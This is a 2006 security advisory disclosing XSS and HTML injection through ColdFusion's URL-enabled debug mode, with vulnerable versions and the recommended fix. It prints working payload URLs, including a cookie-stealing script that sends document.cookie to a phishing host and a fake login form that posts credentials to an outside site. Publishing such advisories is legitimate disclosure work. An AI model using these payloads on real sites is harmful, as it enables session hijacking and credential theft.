23rd June 2006
ProCheckUp Security Bulletin
Title: Coldfusion debug mode vulnerable to XSS and HTML injection attacks
CERT: None
Date found: 19th June 2006
Vulnerable: versions of Coldfusion that allow debug mode by appending "mode=debug" in URLs. Successfully tested against Coldfusion 4.51.
Not vulnerable: Coldfusion MX 7,0,2,142559 (last version as in 6th of July 2006) debug mode appears to escape metacharacters injected in URL parameters and is therefore NOT vulnerable to this bug.
Severity: Medium
Author: Adrian Pastor [adrian.pastor@procheckup.com]
Vendor Status: N/a
CVE Candidate: Not assigned
Description:
Information leakage issues of running Coldfusion debug mode in unrestricted mode were reported back in 2001 by Felix Huber, but nothing has been reported to the public about the possibility of mounting XSS and HTML injection attacks whenever Coldfusion debug mode can be enabled by appending "mode=debug" in URLs.
Since Coldfusion debug mode returns the fields sent from the web browser to the web server under the "URL Parameters" section, it is possible to append a new field in the URL that would contain malicious JavaScript or HTML. In the following examples we add a new field called "attack" that contains the payload.
JavaScript alert() box (it solely illustrates that we can inject JavaScript):
http://[target]/index.cfm?mode=debug&attack=<script>alert('')</script>
Redirection attack:
http://[target]/index.cfm?mode=debug&attack=<script>window.location="http://www.phisherssite.com/"</script>
Cookie stealing attack:
http://[target]/index.cfm?mode=debug&attack=<script>window.location="http://phisherssite.com/capturecookies.php?c="+document.cookie</script>
Credentials stealing attack:
http://[target]/index.cfm?mode=debug&attack=<br><hr><font%20color="red">An%20error%20has%20occured!<br>Please%20enter%20your%20username%20and%20password.</font><form%20action="http://phisher.site/a.php"%20method="post"><b>Username:</b><br><input%20type="text"%20name="u"><br><b>Password:</b><br><input%20type="password"%20name="p"><br><input%20type="submit"%20value="Login"></form><font%20color="white">
It is also possible to inject code as part of the filename:
http://[target]/<script></script>index<script>alert('this%20gets%20printed%20under%20CF_TEMPLATE_PATH%20and%20PATH_TRANSLATED')</script>.cfm?mode=debug
Note: all the previous examples should also work when requesting a non-existing ".cfm" file. The only requirement is that the debug mode can be enabled by appending "mode=debug" in the URL.
Consequences:
Attackers can steal users' sensitive information such as session IDs, usernames and passwords, thus make account hijacking possible.
Fix:
Adobe recommends disabling Coldfusion debug mode in production environments. Additionally, the debug mode could be restricted to localhost only or a list of trusted IP addresses (see references for further info).
References:
http://www.adobe.com/cfusion/knowledgebase/index.cfm?id=tn_17642
http://www.google.com/search?hl=en&q=Felix+Huber+coldfusion+debug+mode
Legal:
Copyright 2006 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the Internet community
for the purpose of alerting them to problems, if and only if, the Bulletin is not edited
or changed in any way, is attributed to Procheckup, and provided such reproduction and/or
distribution is performed for non-commercial purposes.
Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
Categories